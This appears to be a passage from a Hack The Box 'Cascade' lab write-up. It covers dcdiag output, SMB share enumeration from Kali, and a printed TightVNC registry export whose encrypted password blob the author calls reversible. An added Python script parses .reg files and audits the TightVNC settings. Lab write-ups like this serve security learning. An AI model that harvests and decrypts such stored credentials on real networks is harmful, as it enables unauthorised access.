Starting test: CheckSDRefDom
......................... Configuration passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... Configuration passed test CrossRefValidation
Running partition tests on : cascade
Starting test: CheckSDRefDom
......................... cascade passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... cascade passed test CrossRefValidation
Running enterprise tests on : cascade.local
Starting test: LocatorCheck
......................... cascade.local passed test LocatorCheck
Starting test: Intersite
......................... cascade.local passed test Intersite
This appears to be a log file from dcdiag
DCDiag is a command-line tool used in Windows Server to diagnose and test the health of Domain Controllers in an Active Directory environment. It helps identify issues with DNS configuration, replication, trust relationships, and security settings. By running DCDiag, administrators can gather important information about the state of their Active Directory infrastructure. The tool performs tests such as connectivity, DNS, replication, and trust relationship tests, providing a detailed report to aid in troubleshooting and resolving any detected problems.
\\casc-dc1.cascade.local\Data\IT\Temp
┌──(kali㉿kali)-[~/…/htb/labs/cascade/smb]
└─$ tree Temp
Temp
├── r.thompson
└── s.smith
└── VNC Install.reg
3 directories, 1 file
The \\casc-dc1.cascade.local\Data\IT\Temp directory contains 2 sub-directories named after 2 users: r.thompson and s.smith
The registry file appears to be for a VNC installation
\\casc-dc1.cascade.local\Data\IT\Temp\s.smith\VNC Install.reg
┌──(kali㉿kali)-[~/…/htb/labs/cascade/smb]
└─$ cat Temp/s.smith/VNC\ Install.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
The registry file contains a pre-configured set of registry values for a TightVNC server instance
While most of the dword values above are simple 0/1 flags, a few carry meaningful numeric or binary values. They are the following:
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"PollingInterval"=dword:000003e8
"VideoRecognitionInterval"=dword:00000bb8
The VNC service is configured to listen on ports 5800 (HttpPort, 0x16a8) and 5900 (RfbPort, 0x170c).
The converted password is k�*KnZ�
I will go further into this in the dedicated VNC section
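Converting those dword values by hand is error-prone, and the two garbage characters `cat` printed at the top of the file are a UTF-16 byte-order mark, which is how regedit exports .reg files. As an added example (not code from the writeup or from TightVNC), the following Python decodes a .reg export with either encoding, turns `dword:` values into integers and `hex:` values into bytes, and audits the TightVNC Server key for settings a reviewer would question. The sample input is constructed from the values above; the audit rules are my own assumptions.

```python
import re

# Constructed from the TightVNC values above, re-encoded as UTF-16LE with a BOM
# exactly as regedit writes a .reg export (hence the "��" seen with cat).
SAMPLE_REG_TEXT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\TightVNC\\Server]
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"AcceptHttpConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"EnableFileTransfers"=dword:00000001
"IpAccessControl"=""
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"""
SAMPLE_REG_BYTES = b"\xff\xfe" + SAMPLE_REG_TEXT.encode("utf-16-le")

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<value>.*)$')


def decode_reg(data: bytes) -> str:
    """Decode a .reg file, honouring a UTF-16 BOM; fall back to UTF-8 for ANSI exports."""
    if data.startswith(b"\xff\xfe"):
        return data[2:].decode("utf-16-le")
    if data.startswith(b"\xfe\xff"):
        return data[2:].decode("utf-16-be")
    return data.decode("utf-8", errors="replace")


def parse_reg(text: str) -> dict:
    """Return {key_path: {name: value}} with dword -> int, hex -> bytes, "..." -> str.

    Multi-line hex continuations (trailing backslash) are not handled here."""
    result, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if (km := KEY_RE.match(line)):
            current = km.group("key")
            result.setdefault(current, {})
            continue
        vm = VALUE_RE.match(line)
        if not vm or current is None:
            continue
        name, value = vm.group("name"), vm.group("value")
        if value.startswith("dword:"):
            parsed = int(value[6:], 16)              # 0000170c -> 5900
        elif value.startswith("hex:"):
            parsed = bytes(int(b, 16) for b in value[4:].split(",") if b)
        elif len(value) >= 2 and value[0] == value[-1] == '"':
            parsed = value[1:-1]
        else:
            parsed = value
        result[current][name] = parsed
    return result


def audit_tightvnc(server: dict) -> list:
    """Flag TightVNC Server settings that widen exposure (assumed rule set)."""
    findings = []
    if server.get("AcceptHttpConnections") == 1:
        findings.append(f"HTTP (Java viewer) listener enabled on port {server.get('HttpPort')}")
    if server.get("LoopbackOnly") == 0:
        findings.append(f"RFB listener on port {server.get('RfbPort')} bound to all interfaces")
    if server.get("IpAccessControl", "") == "":
        findings.append("no IP access control rules configured")
    if server.get("UseVncAuthentication") != 1:
        findings.append("VNC authentication disabled")
    if server.get("UseControlAuthentication") == 0:
        findings.append("control interface requires no authentication")
    pw = server.get("Password")
    if isinstance(pw, bytes):
        findings.append(f"{len(pw)}-byte password blob present in the export (reversible, not a hash)")
    return findings


if __name__ == "__main__":
    reg = parse_reg(decode_reg(SAMPLE_REG_BYTES))
    for f in audit_tightvnc(reg["HKEY_LOCAL_MACHINE\\SOFTWARE\\TightVNC\\Server"]):
        print("[!]", f)
```

The last finding is the caveat that matters for this share: a TightVNC password in a .reg file on a readable share is a credential, not a hash, and should be treated as exposed.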